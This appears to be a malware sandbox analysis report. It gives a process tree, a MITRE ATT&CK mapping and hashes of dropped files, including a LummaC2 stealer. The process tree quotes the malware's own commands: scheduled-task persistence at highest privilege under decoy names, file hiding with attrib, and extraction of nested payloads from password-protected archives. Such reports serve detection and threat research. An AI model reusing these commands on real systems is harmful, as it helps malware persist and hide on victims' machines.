"C:\Users\Admin\AppData\Local\Temp\u18k.0.exe"
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\u18k.1.exe
"C:\Users\Admin\AppData\Local\Temp\u18k.1.exe"
3⤵
PID:3780

C:\Users\Admin\AppData\Local\Temp\Files\Retailer_prog.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Retailer_prog.exe"
2⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe
"C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe"
2⤵
PID:2720

C:\Users\Admin\AppData\Local\Temp\Files\RoulleteBotPro_x32-x64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RoulleteBotPro_x32-x64.exe"
2⤵
PID:3940

C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
2⤵
PID:3804

C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
2⤵
PID:3720

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:4032

C:\Windows\system32\mode.com
mode 65,10
4⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p1979614625696244291525413362 -oextracted
4⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
4⤵
PID:2060

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
4⤵
PID:1472

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
4⤵
PID:364

C:\Windows\system32\attrib.exe
attrib +H "winhostDhcp.exe"
4⤵
- Views/modifies file attributes
PID:3632

C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
"winhostDhcp.exe"
4⤵
PID:964

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\003z42i3\003z42i3.cmdline"
5⤵
PID:1176

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5esrmbz2\5esrmbz2.cmdline"
5⤵
PID:1992

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
PID:456

C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
2⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\Files\bullpen12.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bullpen12.exe"
2⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\Files\amad.exe
"C:\Users\Admin\AppData\Local\Temp\Files\amad.exe"
2⤵
PID:3936

C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
"C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
2⤵
PID:2896

C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe"
2⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe
"C:\Users\Admin\AppData\Local\Temp\Files\niceeyestrain.exe"
2⤵
PID:1676

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240409103423.log C:\Windows\Logs\CBS\CbsPersist_20240409103423.cab
1⤵
- Drops file in Windows directory
PID:396

C:\Windows\system32\taskeng.exe
taskeng.exe {EEE2D723-5612-4921-B2BB-E01975BFF8C9} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]
1⤵
PID:3768

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
2⤵
PID:3904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
3⤵
PID:3668

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
- Creates scheduled task(s)
PID:2684

C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\FuseTrack Solutions\TrackFuse.js"
2⤵
PID:3088

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3744

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:1400

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Windows Upgrade Manager" /tr "'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe'"
2⤵
- Creates scheduled task(s)
PID:1992

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:3512

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:872

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:3080

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scripting

T1064

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft Office\Office14\winvnc.exe
Filesize
2.9MB

MD5
83bdd32d3c431b7e11d2c02dd0a6d492

SHA1
94b0ff00c5487834ec30227cd25d5fb66ca7241d

SHA256
f5856d693661288c6ad03df2b881d3c4cd3bd39125119b1674485ffc0af8fe1b

SHA512
ed3dcdfbbbf8a8573e326a03410c29e861f1a14422bec6315ce7bdf2bc1b6d7fffb68c76fcd007c0253f8a9a91343250243f7f02a3cfaba5d4a76827aaa8654c

Download Submit
C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\ECGDAAFI
Filesize
92KB

MD5
bd46342c69fd0683a51911e8976bf6b9

SHA1
17a2451a41ecaaa03e7634dfd5c534aff30d4ce4

SHA256
f1467f4fb97e82cbb8490d787f2ca113f32fcc94a6d008fffb3ae7e73e5a089b

SHA512
91e7f0bd5acd35b68788d077529b76a54e9bc4875129a2134bfd5ed5e27588cb43fea26a241e184d9170155c961c16bc724e00502f173351ec2df5c9e3cfb32f

Download Submit
C:\ProgramData\LimitSubmit.txt
Filesize
853KB

MD5
35250978eecab3501fae01dc0ecfe8d6

SHA1
7ea9bfa148a3f3475877264d7499aee3fb547c74

SHA256
8105e2e5e53250220dd030c47118175600f97a067f26f03035f3df1c2c061a71

SHA512
19d216b412e13c448f0a8805b88dddd5a18ef02affcb551988cdb9e2a7a4b5f0af23cdbf1a994d00b0d2a0148a48e15b30d5901e87e9da2290d45a9db83c901c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
73f6596157eb5f1179763fe63a749056

SHA1
fe0d1ec84fc5dd80f902d149ef5e2f78e161b659

SHA256
427d42fc12a215cbf19cf9607ce2bc8e994e2bb02ddf457cbd9bb1e633499236

SHA512
6b9fe2509c1e4202512daff3a5dc4c041de5e9c4a3c44bcc5a7c9cf0142c376bfdc3fbab1b822bfec23fa4fb9f3151daa447847ba3286f75938e34b385a0913c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
94203690ab0ddd4267ddaf67f6413bc7

SHA1
3446151b9073d33883da344f3ac88010e952a3e9

SHA256
2034d456c3700c426642218bc4ab92712cf454c75baacb57188d7b5b8092b1ee

SHA512
c0fa2ebc686b5c60a11097b8a759c6512ef9967febbcc41df50ed0b76a7f24459450e8ce9ab462f1cd4a11c851ec726ae2fe2c5bc5cae2f86c3fab97cd8f4c9d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
95c84277f91cb40f2a96bc4cc405a771

SHA1
082aef9405e789e4dd623ff9c30f4e5d8762bdc3

SHA256
baa37fd3711e636ebed568d125eb47f97d1ddf7eb239d058ea05ce699bd2f08a

SHA512
9a904347672522eff0e030ac751305c3cd3e87a8db3b71a490d9c4ef540c19589fe2955d3d577c1e117cfa986a3ded1406da213161ebb45cca236bbf991e0ddb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
579078f2296170abecdbffd4700bea67

SHA1
a9faf66e5bec55df574e7ce24ca0a095668afa8a

SHA256
9999eda6bf06a354be2e1403c834e742228472f18bfe01dfb1382f6d31f2b07e

SHA512
fefc971a926d5cf7e45fb6e5495b27551556b41959d02af0e0c81141fa745364fb29b28d71f4f10ab7182381883def8b04956d4823e3d061c935e65eacd0aedd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
42638fb2586231d0ed29c1a8dcbe5d78

SHA1
916993ca455f1ea9fd5b53861d874b76e49485d1

SHA256
eda08c75d3873fb88aeb65f24b75423f1ac1a074aee5811da5d69319cfaf1675

SHA512
a6996fe648428915d051f8cd2d5e730e244fee7880ea530f05205a185827b805a32ca259af731fcdc669031b276ac9543f6b9d2cbc091827b58b287f339d4a3d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
30ce617aa30b87c4108bcea7ef575f8b

SHA1
2a45155382f392297a51b2f039cd54275f8532a2

SHA256
cb5d39cac91d91bd4bb75800c3756b3f25655e965e55443144091d83a1c19a7d

SHA512
b3d96a1a384ced08c3dc9cda5fb7ee8c5e1a41078576b15d203840c7deb4a028cf059038a887f61ffbbeda7bf8d28a8be488e1f5b2937f141a66e517cc13a0fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U4VLHPRO\1[1]
Filesize
85KB

MD5
34a87206cee71119a2c6a02e0129718e

SHA1
806643ae1b7685d64c2796227229461c8d526cd6

SHA256
ecea49f9a754af7055b60a860acfd8ce2bc63048c947c9ee6324f07d45c4787d

SHA512
e83b0e003687ebe5d5df5bd405b12b267e07252838d1575dc390b409e03279f9d0ce4a4691971a9601f58d52e55af2fa8ea9596ace4bef246f9ef511b65cdbc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\208925959.exe
Filesize
14KB

MD5
2f4ab1a4a57649200550c0906d57bc28

SHA1
94bc52ed3921791630b2a001d9565b8f1bd3bd17

SHA256
baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa

SHA512
ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\2101319596.exe
Filesize
8KB

MD5
11861ff368cdb82536b9313e7301ce4f

SHA1
7691adefb0d65fcdd7803ce8896d183cd4edc3cf

SHA256
38a5e274bd63a97d2075a0f24b521dcce4f63e8e5faf3a458da1f227d38f485e

SHA512
379e174a6bb0fabaa5ac2acebb30d6032992cd1c943f41ded4613697b11b88e2b14ee060b49c2d676253bc0ae8095ac0df4ea8948dfd464a812d7721cd61b7f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\350630453.exe
Filesize
85KB

MD5
10ffc145e1c09190a496a0e0527b4f3f

SHA1
e21fba21a11eecb4bc37638f48aed9f09d8912f6

SHA256
80b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d

SHA512
bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\FCBAEHCAEG.exe
Filesize
106KB

MD5
fe380780b5c35bd6d54541791151c2be

SHA1
7fe3a583cf91474c733f85cebf3c857682e269e1

SHA256
b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53

SHA512
ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ISetup2.exe
Filesize
413KB

MD5
0519b278b624bc86376278205355d163

SHA1
d29bf131b735cbfa4a4cc0184e013a12c90cea80

SHA256
96fce38b0770ed265a22ba22258c9f81c0cd24d990f924a3891b0561dc53fb34

SHA512
284b76dd7e9512baf02acefe6eca92e11ca1a6f15769c9132f1a0ed582173eb599cc02dfe4a79e48063d338a2303cb53085f4908426b5c3527279591c5f6cc56

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
Filesize
290KB

MD5
fd9d245c5ab2238d566259492d7e9115

SHA1
3e6db027f3740874dced4d50e0babe0a71f41c00

SHA256
8839e1ba21fa6606dd8a69d32dd023b8a0d846fcafe32ba4e222cd558364e171

SHA512
7231260db7c3ec553a87e6f4e3e57c50effc2aefa2240940c257bf74c8217085c59a4846b0de0bdd615b302a64df9a7566ec0a436d56b902e967d3d90c6fe935

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe
Filesize
533KB

MD5
eeabe641c001ce15e10f3ee3717b475a

SHA1
10fdda016fc47390017089367882281c6d38769f

SHA256
bb5ef9f70483ed7c79e37eca9dd136a514a346943edfe2803e27d1f6b262f05a

SHA512
1b0b9a398cf5a5e7c5ab0035796d07db720a8babcaf93fc92d1119ada5785c9de4d5df6a0ed10a29198cb4cd7c57da50ef4dc4c4fba5c77f72bf9fdcb73ac55a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
Filesize
105KB

MD5
71fb6e7399edece22128ad713c4c1c9c

SHA1
ebb1e16504ddd152e9d85e85c0097f7c78ce7b53

SHA256
b49df048c103c3694d3c79d6736c34fad3683cb8b4256da06f14b64e5c1d1839

SHA512
9565a1d42dcc0fb1121810db9a026c5f7e48d9c8f72214e8ae0030351679b0d66977b41c06f10e86e74aeecd90043c9db3f008aaa8fceb2a005eaf4d8b58c14b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\appdata.exe
Filesize
473KB

MD5
76df4a59b141eb56536805aa8c597c24

SHA1
63fc19aba48ffbea4b43cbdfe5de577905a764e3

SHA256
dadff5f7199fd06f151dc1808c6a3e3a45447d19eb4f5639e47fe2f24cfd3b84

SHA512
1be6193693d8f892c0f96b37757a50b9b324f8c4e3a32f474bf05ff94b8dba36b39ca627edfc1b0781743dcd1c2d1721e5c10744d086f0c1f321a2ed1bedace6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\bullpen12.exe
Filesize
5.6MB

MD5
3abe68c3c880232b833c674d9b1034ce

SHA1
ab8d0c6b7871b01aadac9d8e775b2a305bc38a6b

SHA256
07632170506689c16d08c0ffe3b8ac37f959a35e5a4ac811e38318ac83b58f92

SHA512
bb44f8d068e360427fde7015d7b845ecd1f58f4f11317e6fa1a86f24a2744f23e5f60c9019818a800f4a01214513be4978126edda298778b3f9b19d8c7096351

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
Filesize
1.8MB

MD5
97256cf11c9109c24fde65395fef1306

SHA1
e60278d8383912f03f25e3f92bf558e2a33f229d

SHA256
21c23083404349dbc8e7094338acaa07ea5a7e3a442bb81a528e06c175b8d934

SHA512
41e9c7911c1f461ec389ac9d430898bd9e21accf6b4291d30c4e743084bb19c2ae9279597f4a43cfaec621263cb135c3ada21e23e27cc7961c794fa499910c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
Filesize
4.1MB

MD5
888a1c86f1f4db39987a66613ea87104

SHA1
82e70e1434c19c9cf84be6ed963009c13a7cd2f7

SHA256
6110c7a02fe334fd3cfda9a7be565b4bd3ce59661fba7b744fec1c5a8d46a229

SHA512
fb083f8ba9924cf739f0f020e1989b777f5b083bbdcff45255628bf798b7269231dcb06b9266cfd2d469f81b9d880730882146cf5c663c15f0b67cabb13c9b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
Filesize
315KB

MD5
73c4afd44c891cd8c5c6471f1c08cbfb

SHA1
3372f8ae05574924144cb9671fc455f6d7fc19e7

SHA256
eb9218ab72b011d8d5075fedeaaed45b3e6889ee5d31b53b617ce6951752f132

SHA512
fe8e07cf2b039ef421a24672435ce4dad506f2317355881b3484fa7bae61856428a54781632cc5bb0615dd07d9fa07d0ce20514dc611f863b55af89b8e77c822

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
Filesize
28KB

MD5
1f877b8498c53879d54b2e0d70673a00

SHA1
60adf7aaa0d3c0827792016573d53d4296b21c18

SHA256
a399a577164bba13568d68d4ad05c4a2a6eda71bc97e5f1edb5462371330473f

SHA512
b19ebdf8ed9ec9d3885d0d003c556d0dd04b81d5d1f22aff8a987aeaf76977d52bb7a43ec68786b5e68b97f3658e0856a582670835d37ba57e38b9f8d8adc96e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe.mini
Filesize
249KB

MD5
1e25cbe9f94e6b722ee51aae680f5510

SHA1
74cf67380449e0d81ba5c15a43ea7fdf703ba7ef

SHA256
152704e13aba56bccb1183992109216ee3c2d007dfe123ff5762955ecd3b8f00

SHA512
5bbbb5a1d643b1251ea0dcf4a609e448b4cd91bcb36e737810e48f989954cb243905798eb2c0fbb05ded4f18fc49a92d0330ec981dadc7d5a13ff17ffa04cf8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
Filesize
5.0MB

MD5
a3fb2b623f4490ae1979fea68cfe36d6

SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4

SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe
Filesize
78KB

MD5
266d5b3b26e55605740febc46e153542

SHA1
8d2fea8969dc06c01383db64a4ac63d12bba64f3

SHA256
ecf59a89782ae1f2a7a813196ffab52431ee69d993c577b02ccbab655a5ee825

SHA512
20085c1bf587e65763625fcf7e42948192fa0e4bb9e47d1d9947684fd75179229a6c231908d9efb7b8019ac10069e2c1c8c4a91f646ffcffefa7bf8ddf6d1cd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
Filesize
272KB

MD5
23f48e6670530fbed44d3ab34a568f61

SHA1
b789c215a2a43cc8e1e10d0f1700970b4ac45acd

SHA256
decb5b85b000b70572d2e6f91da872ea0ea83f07b8110525a6ebe0849a95cfc5

SHA512
4b0935145a8f6115079f3c54c8dd692c347ddd8d918b5859f1ebac378eb23b1f7c4d279ecdcbba09c4f7ee70924c5fcf39fbc12a3f97f366ff872b6f110d7446

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\up.exe
Filesize
9.4MB

MD5
b202c04f992ff0c2ea95e366c41a6b5e

SHA1
9b9682a2faa946180d285574a1002c7cb8154e81

SHA256
8621fcce46af6801e66cdf04902595e39729bc878e4ab17c0de51fdcab6e1e73

SHA512
2579524c65a3a797e202c98dd23ed9b9fcdb9bc0c377892b0ec539729b253142daada1ca606671eee41a3cb6647e2a2f626138f0ce94490147360b7a162fe113

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\yoffens_crypted_EASY.exe
Filesize
832KB

MD5
e3c0b0533534c6517afc94790d7b760c

SHA1
4de96db92debb740d007422089bed0bcddf0e974

SHA256
198edf9613054f8a569ac804bf23081fbfa8566270fff05bba9dc3c9a32d9952

SHA512
d12631796afca877c710b9308d1236fca1bfe3abe6582445d9df1bbb404160cff220316e3f600b3a87b46dd3bfb859734008b5c668e410466e82be9dc033249e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
Filesize
8.3MB

MD5
fd2727132edd0b59fa33733daa11d9ef

SHA1
63e36198d90c4c2b9b09dd6786b82aba5f03d29a

SHA256
3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

SHA512
3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Filesize
492KB

MD5
fafbf2197151d5ce947872a4b0bcbe16

SHA1
a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

SHA256
feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

SHA512
acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8760.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
Filesize
2KB

MD5
4a833602e7452a760506b2fccd0dd56c

SHA1
adb214e4e1c8205912c5472a133e06d7e04844d8

SHA256
8757de12a692ced2f25219446ae6bbd794fe05bc8e9174f14e86ed4a55c7ecd0

SHA512
b8ea7efe8341cf30ccedd3cd3b4b9119e18d3889036429f4d3dae721886c0530a40c6fb305358696c6f2e72c919e426b9cf21bb546d54905585e2fa5229b3d7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
Filesize
4KB

MD5
64452e2524cbe2219bf7e33534c0349f

SHA1
496705cafd588710da85d231fb44da95e4b83202

SHA256
3a7d5e00d522e7210fe9058c3d0a4218796bc22725814d6e0557a8d8302c10de

SHA512
1668196d4ededc681538c6acdc78e88d56f5e43c687745d68d17808fd0c4ab07a87b32dbcb71a707013087fe9da0fd2d829600cdc62af6ff3d7765972657ccb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ketix.ini
Filesize
6KB

MD5
5c087b281ac0709c8f1066b7aeaff078

SHA1
6952ef067cf521d795c58645e52f8c2a9bfc3b24

SHA256
4fef04e01d00862f6ccab97aca296cc0a4d6bd91e8553d0dc1b42570e86f2dae

SHA512
6e755fa799f768d36e0c294b1ffa83b00e9bbb00388c06638b558dc34ffd1a3623a08e9b04243dfd8d1f31ba7554d6357193f8d2079e2ef1fa9708db5b4ff5f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat
Filesize
484B

MD5
d57fe62e03f55b1802da7cc5a40356ba

SHA1
a5208c2e019b31461091c2a4bb71ee4f381616d0

SHA256
64159b9ffcc0ecc2e2743a921fff8211da6b4cba720f33a9d04f16df163f3b0a

SHA512
25a2bc5f58124d692e60c9234c940a7d02029f1a059b40e2ce9393b4bae91b660b07c2bc7999241a774f1617ff6c7086001432c0cc28d6fdf6e1bcee7d864a12

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
5.3MB

MD5
1afff8d5352aecef2ecd47ffa02d7f7d

SHA1
8b115b84efdb3a1b87f750d35822b2609e665bef

SHA256
c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

SHA512
e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
